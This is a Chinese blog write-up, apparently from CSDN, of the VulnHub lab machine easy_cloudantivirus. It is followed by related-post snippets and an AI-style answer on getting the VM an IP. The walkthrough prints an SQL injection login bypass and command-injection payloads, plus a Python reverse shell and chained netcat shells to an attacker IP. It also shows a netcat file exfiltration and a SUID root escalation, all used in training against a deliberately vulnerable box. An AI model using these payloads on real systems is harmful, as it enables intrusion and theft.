打靶第二周-easy_cloudantivirus

最新推荐文章于 2024-12-05 15:00:26 发布
原创 最新推荐文章于 2024-12-05 15:00:26 发布 · 2k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

easy_cloudantivirus

靶机地址

easy_cloudantivirus

攻击手段

  • 端口扫描
  • WEB侦查
  • SQL注入
  • 命令注入
  • 密码爆破
  • 代码审计
  • NC串联
  • 本地提权

所用工具

arping
nmap
hydra
nc
burp
sqlite

开始攻击

主机发现

使用arping来发现
因为arping一次只能扫一个可使用for i in $(seq 1 254);do arping -c 2 192.168.168.$i;done来扫描网段
在这里插入图片描述

也可使用nmap 192.168.168.0/24发现主机

在这里插入图片描述
可看到目标主机开了22和8080端口,扫描具体的端口和服务nmap -p22,8080 -sV 192.168.168.14
在这里插入图片描述

访问8080
在这里插入图片描述
发现是一个云病毒扫描
需要使用邀请码登录。
这样就有两种方法

  1. 暴力破解
  2. sql注入

sql注入

抓包后,可以尝试所有的特殊符号33个。发现"报错查看页面后
在这里插入图片描述
看到sql语句
select * from code where password="' + password + '"
这样就可以闭合sql语句
使用or 1=1使条件永为真
即输入"or 1=1--+
在这里插入图片描述
成功进入
当输入hello中时
在这里插入图片描述

命令执行

由上面得,我们猜测在后端执行的命令得逻辑为
avscan hello |ls
这样输入hello |ls得到
在这里插入图片描述
成功!

反弹shell

因为本机有python2环境,可使用上次使用的反弹shell

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("192.168.168.13",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

但这次尝试nc反弹shell

查看是否有nc

hello |which nc
在这里插入图片描述
返回了路径,证明有nc

开启侦听nc反弹

kali端执行nc -nlvp 4444命令
浏览器执行hello |nc 192.168.168.13 4444 -e /bin/sh失败了
可能是因为此nc版本不支持-e参数
删除-e,可收到链接。
hello |nc 192.168.168.13 4444
在这里插入图片描述

nc串联

先在kali开启两个监听,分别监听3333和4444端口
在浏览器执行命令hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
两个nc都收到了返回,在3333端口执行命令,会在4444端口看到返回!
在这里插入图片描述
分析hello |nc 192.168.168.13 3333 |/bin/bash |nc 192.168.168.13 4444
执行后会先在3333端口建立链接,这时在3333输入任何命令都会调用/bin/bash,执行之后从4444端口输出

查看文件

有app.py和datebase.aql
file database.sql

尝试sqlite失败,这样可以下载下来查看

下载文件

开启nc侦听5555端口并将得到的数据存入db.sql。
nc -nlvp 5555 > db.sql
之后在3333端口执行nc 192.168.168.13 5555 < database.sql
在这里插入图片描述
并使用sqlite打开
在这里插入图片描述
可看到插入数据。

查看目标中有哪些用户

在3333端口执行cat /etc/passwd
在这里插入图片描述
使用cat /etc/passwd | grep /bin/bash筛选出具有shell执行权限的用户
在这里插入图片描述
有三个:root,cloudav,scanner

制作字典

创建vi user.txt
在这里插入图片描述
创建vi pass.txt
在这里插入图片描述

ssh爆破

命令hydra -L user.txt -P pass.txt ssh://192.168.168.14

在这里插入图片描述
可惜失败了!

查看其他文件

在上一级目录中发现了相同名称的文件
在这里插入图片描述
ls -l后发现updata_cloudav文件得所有者是root
在这里插入图片描述
这样若我们能进行命令注入将得到root权限
查看源文件cat update_cloudav.c
在这里插入图片描述
可看到在执行该文件时需在后面加命令
猜测
看到调用了log
猜测也可调用nc

提权

再次使用./update_cloudav "a|nc 192.168.168.13 5555 | /bin/bash |nc 192.168.168.13 6666"并监听5555和6666。
在这里插入图片描述
这样就得到了root权限!!

补充:暴力破解邀请码

kali自带字典位置/usr/share/wordlists
选中字典后使用burp suit进行爆破。

总结

本次实验包含

  • 主机发现
  • 端口扫描/服务发现
  • sql注入/爆破
  • 命令执行
  • ssh爆破
  • suid提权

勇于尝试,遇到失败转换思路,不要气馁。

easy_cloudantivirus靶机打靶过程及思路
qq_52610024的博客
04-04 2249
5.侦听4444端口通过连接获得shellnc10.0.2.44444-e/bin/bash-e的参数的作用是执行成功之后运行shell,发现。./update_cloudav“a|nc10.0.2.45555|/bin/bash|nc10.0.2.46666”进行suid。6.nc10.0.2.43333|/bin/bash|nc10.0.2.44444nc串联攻击。2.发现留言板后,两个思路,第一个思路是进行暴力破解,第二个思路是通过。...
(一)easy_cloudantivirus靶机渗透练习
qq_69746732的博客
01-04 1517
easy_cloudantivirus靶机渗透练习
VulnHub靶机-easy_cloudantivirus 打靶
网络空间安全学习
04-12 1092
加上以上四个密码,尝试进行爆破,创建user.txt和passwd.txt,将以上的用户信息和密码填入,进行爆破,使用hydra爆破,但是未果。此数据库文件为sqlite3,使用命令sqlite3查看一下,发现无此命令,那只能将其下载到本地,进行查看利用。执行过后,发现无反应,没有反弹,可能此linux当中的nc不支持-e参数,采用nc串联的方式。抓包,发现password参数,可进行注入,导入fuzzer字典,进行模糊测试。发现.c文件,并且已经编译好,恰好属主为root,那么利用一下,直接运行。
0x02-easy_cloudantivirus
rec09er的博客
04-12 1233
靶机介绍:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/ 靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova 通关目标:取得目标靶机的root权限 攻击机:kali(10.0.2.10) 目标靶机:easy_cloudantivirus(10.0.2.13) 涉及攻击方法:  ● 主机发现  ● 端口扫描  ● 目录扫描  ● SQL注入
vulnhub-easy_cloudantivirus
qq_41810304的博客
06-01 726
前言: 做这个靶机隔了很长时间,因为在搞毕业设计以及找工作,现在只能说论文告一段落,只剩答辩和ppt了,就接着把这个做完,下载地址也不想找了,总体而言该靶机比较简单。最后,求答辩老师放过我吧。 Kali:192.168.1.4 目标机:192.168.1.31 信息收集: 漏洞挖掘: 从信息来看,开放ssh和网站端口,并且该网站是Python写的。可以爆破22端口,一般来说还是从网站下手,在我看来爆破密码依然是最后手段。先访问8080端口。 一般这个界面没有思路的话就是看看页面源码有没
Vulnhub-easy_cloudantivirus
weixin_46107179的博客
04-01 2947
靶机下载地址:靶机下载 主机发现 通过搭建的靶机环境,可以直接通过arp-scan -l 或者arping来发现主机,得到IP地址后进行信息搜集 信息搜集 通过nmap扫描得到靶机开放了22、8080端口,并且web服务是Werkzeug httpd 0.14.1 (Python 2.7.15rc1) 既然是web服务,通过浏览器打开看到说需要邀请码,可能是需要什么密码什么的 渗透攻击 这里可以有两种攻击手段,一种是SQL注入,可以使用" or 1=1 --+绕过,另外一种是暴力破解,我这里使用bur
easys_cloudantivirus
m0_72733529的博客
07-14 876
靶机地址:BoredHackerBlog: Cloud AV ~ VulnHub靶 机 ip:192.168.0.156ka li ip:192.168.0.102内容简介:这是本系列的第02次打靶,我选择了一个低难度级别的靶机。虽说难度级别为低,但是从还原整个渗透过程的角度来看,这个靶机非常全面。在这次打靶过程中,我们将使用到以下攻击手段:端口扫描WEB侦查SQL注入命令注入密码爆破代码审计NC串联本地提权 nmap -p- 192.168.0.156 全端口扫描 nmap -p
2、easy_cloudantivirus
dreamer292的博客
07-13 776
需要再kali上面开启3333和4444的监听,会建立两个连接一个用来执行命令一个用来回显命令,可以看到命令的中间有一个bash其实就是3333建立的连接然后在上面执行命令传给bash去执行然后再将结果发给4444的这个连接回显会来。下载好靶机后直接启动了,我发现这个靶机如果一开始选择我的无线网卡会启动不了,需要先选择一个没有的网卡启动然后关闭后再选择正确的网卡启动就可以了。又出现了这种情况,就是明明连接上了但是没有回显的情况,看了视频原来是并没有建立一个shell的反弹只是建立了一个连接。
easy_cloudantivirus
guowu666的博客
09-18 949
必须安装在virtualbox攻击机:kali靶机 easy_cloudantivirus
打靶记录2——靶机easy_cloudantivirus
Fab1an的博客
07-18 822
针对靶机,首先做了主机发现,当发现了它的目标IP地址之后对它进行端口扫描和服务版本的发现,进而发现了一个HTTP的服务,工作在目标靶机的8080端口上于是我们通过浏览器访问目标靶机8080端口上的Web服务于是在这个Web页面上,我们发现了一个SQL注入漏洞,也可以使用暴力破解的方式去破解它的邀请码,进而去登录到Web应用的后台页面在后台发现命令注入漏洞,利用命令注入漏洞获得反弹的Shell然后在目标靶机上进行信息收集。
打靶笔记--easys_cloudantivirus
2301_77315080的博客
04-22 769
打靶笔记--easys_cloudantivirus
kali之vulhub,easycloudantivirus
weixin_54431413的博客
05-07 535
一、靶机描述 二、主机发现 三、端口扫描 四、服务版本扫描 五、登录网址 六、利用远程命令执行漏洞与kali建立连接 七、提权 八、利用suid提取
VulnHub打靶记录——easy_cloudantivirus
未完成的歌~的博客
06-29 889
靶机下载地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/将靶机设置为NAT模式并启动。
[vulnerhub] easy_cloudav write up
CN_DS的博客
08-14 659
摘要 0x1 靶机:192.168.88.13(靶机下载地址:https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova) 攻击机:192.168.88.8 每周六都会跟着苑老师学习一片打靶课程, 然后做一篇writeup。废话不多说,开干!! 我的靶机安装在virtualbox上,攻击机使用的是kali,安装在vwmare上。使用的是桥接。链接到手动创建的...
easy_cloudantivirus靶机
2401_87493916的博客
12-05 321
到上一层,发现了一个拥有suid权限标记位,并且它的所有者是root,凡是拥有suid这个权限标记位的可执行程序,当它一但执行,无论你当前是任何用户账户,你只要执行这个程序就默认你继承这个程序文件的属主的权限。通过file查看一下sql文件,是一个sqlite文件,这个就有可能是web服务端的数据库,因为sqlite是一个本地的数据库,内容都是以数据库文件的形式存放,一些文件目录下。nc有很多版本,不同liunx发行版,都会使用不同的nc版本,有些发行版是没有-e这个参数的。
VulnHub靶机-easy_cloudantivirus | 红队打靶02
qq_47289634的博客
07-20 461
靶机地址:攻击机kali IP:192.168.56.102这里是用的netdiscover+nmap 使用nmap对目标主机进行信息收集,看到开放了22,8080端口,分别运行了ssh和http服务 访问一下8080端口,发现是一个病毒防护的网站,需要输入邀请码 看到框就试试看有没有SQL注入,抓包,发送到burp中的测试模块爆破一下 看到有些响应长度很大的明显不一样,复制pyload,在网页打开看一下 直接看到了sql语句,根据sql语句构造闭合,在配合万能密码登录到后台, ,这里我们输入
EagleClouds专业网站建设和软件开发服务
nextworld8的博客
10-01 2810
EagleClouds专业网站建设和软件开发服务
计算机安全的特征是什么,计算机中病毒的特征是什么?
weixin_35592186的博客
07-20 448
有时我怀疑我的计算机中装有病毒,但是我不知道该怎么办?以下是学习编辑器对计算机中病毒特征的详细介绍!希望对您有帮助!计算机1中的病毒功能简介僵尸病毒: 可能是计算机运行速度较慢且计算机卡住了木马病毒: 它可以窃取用户的隐私和有价值的信息宏病毒: 通常存在于办公软件中,对系统极具破坏力只有几个简单的句子,就有很多类型的病毒,我建议主机使用安全软件来保护计算机的安全.建议您下载并安装腾讯计算机管理器并...
boredhackerblog-cloud-av无法获取地址
最新发布
05-11
<think>好的,用户现在遇到了关于“boredhackerblog-cloud-av”靶机无法获取IP地址的问题。我需要帮他们解决这个问题。首先,我得回忆一下常见的虚拟机网络配置问题,尤其是VirtualBox环境下,因为用户提供的引用中提到使用的是OVA文件,这通常与VirtualBox相关。 首先,用户可能没有正确配置虚拟机的网络适配器。VirtualBox默认使用NAT模式,但这可能会导致靶机无法获取可被攻击机(如Kali)访问的IP地址。需要建议用户检查网络设置,改为桥接模式或Host-Only模式,这样靶机可以获得同一网段的IP。 接下来,用户可能需要启动虚拟机后手动运行DHCP客户端来获取IP。特别是如果靶机基于Linux系统,可能需要使用dhclient命令。此外,查看网络接口的配置是否正确也很重要,比如使用ifconfig或ip addr命令检查是否有活动的网络接口,并确认是否分配了IP地址。 然后,ARP扫描和nmap扫描是常用的方法,用于发现同一网络中的设备。用户可能需要在攻击机上执行这些扫描,以确认靶机是否存在并获取其IP地址。如果扫描不到,可能需要检查防火墙设置,确保没有阻止DHCP请求或网络通信。 另外,用户提供的引用中提到靶机的IP是10.0.2.13,而Kali的IP是10.0.2.10。这可能意味着他们使用的是Host-Only网络适配器,或者VirtualBox的NAT网络。如果用户使用的是NAT网络,可能需要配置端口转发,但通常桥接或Host-Only更适合渗透测试环境,因为它们允许同一局域网内的通信。 最后,如果所有步骤都无效,可能需要检查OVA文件的完整性,重新导入或重新下载文件。有时候,虚拟机的配置文件可能损坏,导致网络服务无法正常启动。 需要将这些步骤分点整理,确保用户能逐步排查问题。同时,提醒用户在操作过程中注意网络适配器的选择,以及命令行工具的使用方法。可能还需要解释一些术语,如桥接模式和Host-Only模式的区别,帮助用户理解为什么需要更改这些设置。</think>针对boredhackerblog-cloud-av靶机无法获取IP地址的问题,以下是分步排查方案: 1. **检查虚拟机网络配置** - 在VirtualBox中选中靶机 -> 设置 -> 网络 -> 选择**桥接网卡**或**Host-Only适配器** - 确认攻击机(kali)与靶机使用同类型网络适配器 - 典型配置示例: ```bash 攻击机IP:10.0.2.10/24 靶机预期IP段:10.0.2.11-254/24 ``` 2. **启动后获取IP操作** ```bash # 在靶机控制台执行(需有系统权限) dhclient -v eth0 # 强制更新DHCP租约 ifconfig/ip addr # 查看实际分配的IP地址 ``` 3. **使用扫描工具定位** - 在攻击机执行ARP扫描: ```bash arp-scan -l --interface=eth0 ``` - 使用nmap扫描目标网段: ```bash nmap -sn 10.0.2.0/24 ``` 4. **验证防火墙状态** - 在靶机检查防火墙规则: ```bash iptables -L -n -v # Linux系统 systemctl status firewalld ``` 5. **特殊配置检查** - 确认OVA文件导入时勾选**重新初始化所有网卡MAC地址** - 检查VirtualBox全局网络设置: ```bash 文件 -> 主机网络管理器 -> 创建/启用Host-Only适配器 ``` **注意**:该靶机实际部署后默认通过DHCP获取IP,若仍无法发现,可尝试通过VirtualBox控制台直接查看启动日志: ```bash VBoxManage showvminfo "easy_cloudantivirus" --details ```
评论 6
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值